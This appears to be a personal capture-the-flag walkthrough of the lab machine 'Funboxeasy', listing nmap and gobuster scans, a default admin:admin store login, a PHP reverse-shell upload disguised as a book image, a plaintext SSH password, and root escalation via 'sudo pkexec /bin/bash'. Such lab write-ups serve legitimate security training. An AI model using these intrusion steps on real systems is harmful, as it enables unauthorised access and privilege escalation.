Funboxeasy

PG Funboxeasy Notes

Date: 13.06.2021

Nmap scan: sudo nmap -p- -sV -sC -v 192.168.119.111

Two open ports:

Port 22: OpenSSH 8.2p1 Ubuntu
Port 80: Apache httpd 2.5.41

Contains the apache2 Ubuntu default page

Gobuster scan: gobuster dir -u http://192.168.119.111 -x php,txt -w ~/Lists/gobuster/Gobuster-Dir-Medium.txt -t 25

 0/index.php            (Status: 200) [Size: 3468]
 1/profile.php          (Status: 302) [Size: 7247] [--> http://192.168.119.111/index.php]
 2/header.php           (Status: 200) [Size: 1666]                                       
 3/store                (Status: 301) [Size: 318] [--> http://192.168.119.111/store/]    
 4/admin                (Status: 301) [Size: 318] [--> http://192.168.119.111/admin/]    
 5/registration.php     (Status: 200) [Size: 9409]  
 6/logout.php           (Status: 200) [Size: 75] 
 7/robots.txt           (Status: 200) [Size: 14]   
 8/dashboard.php        (Status: 302) [Size: 10272] [--> http://192.168.119.111/index.php]
 9/secret               (Status: 301) [Size: 319] [--> http://192.168.119.111/secret/]    
10/secret               (Status: 301) [Size: 319] [--> http://192.168.119.111/secret/]    
11

Robots.txt: Disallow: gym Secret: „Anyone who lives within their means suffers from a lack of imagination.“ Oscar Wilde (*1854 - †1900)

Admin login page of the store: http://192.168.119.111/store/admin.php => login with admin:admin

http://192.168.119.111/store/admin_verify.php

Edit a book and upload a php shell instead of an image => browse the store page => reverse shell gained (www-data).

Python 3.8.2 is installed => TTY Shell

Go to /home/tony and read the password.txt file.

Tony's SSH password: yxcvbnmYYY

 0Matching Defaults entries for tony on funbox3:
 1    env_reset, mail_badpass,
 2    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 3
 4User tony may run the following commands on funbox3:
 5    (root) NOPASSWD: /usr/bin/yelp
 6    (root) NOPASSWD: /usr/bin/dmf
 7    (root) NOPASSWD: /usr/bin/whois
 8    (root) NOPASSWD: /usr/bin/rlogin
 9    (root) NOPASSWD: /usr/bin/pkexec
10    (root) NOPASSWD: /usr/bin/mtr
11    (root) NOPASSWD: /usr/bin/finger
12    (root) NOPASSWD: /usr/bin/time
13    (root) NOPASSWD: /usr/bin/cancel
14    (root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh

Abuse pkexec to escalate your privileges: sudo /usr/bin/pkexec /bin/bash => root

find / -name "local.txt" to find the user flag.